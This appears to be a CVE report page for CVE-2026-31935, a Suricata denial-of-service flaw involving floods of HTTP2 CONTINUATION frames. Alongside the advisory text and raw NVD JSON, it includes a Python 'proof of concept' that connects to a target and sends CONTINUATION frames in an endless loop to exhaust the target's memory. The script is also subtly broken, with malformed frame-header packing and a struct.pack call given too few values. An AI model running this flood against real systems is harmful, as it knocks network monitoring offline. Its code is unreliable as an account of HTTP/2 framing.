Security Vulnerability Report
CVE-2026-31935 CVSS 7.5 HIGH

CVE-2026-31935

Published: 2026-04-02 15:16:38
Last Modified: 2026-04-07 21:20:25

Description

Suricata is a network IDS, IPS and NSM engine. Prior to versions 7.0.15 and 8.0.4, flooding of crafted HTTP2 continuation frames can lead to memory exhaustion, usually resulting in the Suricata process being shut down by the operating system. This issue has been patched in versions 7.0.15 and 8.0.4.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE (Suricata < 7.0.15)
cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE (Suricata >= 8.0.0, < 8.0.4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-31935: Suricata HTTP2 Memory Exhaustion
# This script sends a flood of HTTP2 CONTINUATION frames.
import socket
import struct

# Target IP and Port (Suricata Inspection Interface)
TARGET_IP = "192.168.1.100"
TARGET_PORT = 80

def create_http2_continuation_flood():
    try:
        # Establish TCP connection
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_IP, TARGET_PORT))

        # Send HTTP/2 Connection Preface (Simplified)
        preface = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'
        s.send(preface)

        # Send SETTINGS frame (Simplified)
        settings_frame = struct.pack('>HBBLLLL', 0, 4, 0, 0, 0, 0, 0)
        s.send(settings_frame)

        print(f"[*] Flooding {TARGET_IP} with HTTP2 CONTINUATION frames...")

        # Send malicious CONTINUATION frames
        payload = b'A' * 1000
        while True:
            # Frame Format: Length(3) | Type(1) | Flags(1) | StreamID(4)
            # Type 0x9 is CONTINUATION
            frame_header = struct.pack('>HBBLL', len(payload), 0x9, 0x0, 0x1)
            s.send(frame_header + payload)
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        s.close()

if __name__ == "__main__":
    create_http2_continuation_flood()

References

https://github.com/OISF/suricata/security/advisories/GHSA-vxrp-5pg7-7v4x (Vendor Advisory)
https://redmine.openinfosecfoundation.org/issues/8289 (Issue Tracking, Permissions Required)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-31935",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-02T15:16:37.657",
    "lastModified": "2026-04-07T21:20:24.760",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Suricata is a network IDS, IPS and NSM engine. Prior to versions 7.0.15 and 8.0.4, flooding of craft HTTP2 continuation frames can lead to memory exhaustion, usually resulting in the Suricata process being shut down by the operating system. This issue has been patched in versions 7.0.15 and 8.0.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-400"},
          {"lang": "en", "value": "CWE-770"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "7.0.15",
                "matchCriteriaId": "1E0D4CF4-11E0-4FB1-9C17-F38257D376ED"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "8.0.0",
                "versionEndExcluding": "8.0.4",
                "matchCriteriaId": "F35C5A48-CA30-43B3-9E53-D3E51C862604"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/OISF/suricata/security/advisories/GHSA-vxrp-5pg7-7v4x",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://redmine.openinfosecfoundation.org/issues/8289",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Permissions Required"]
      }
    ]
  }
}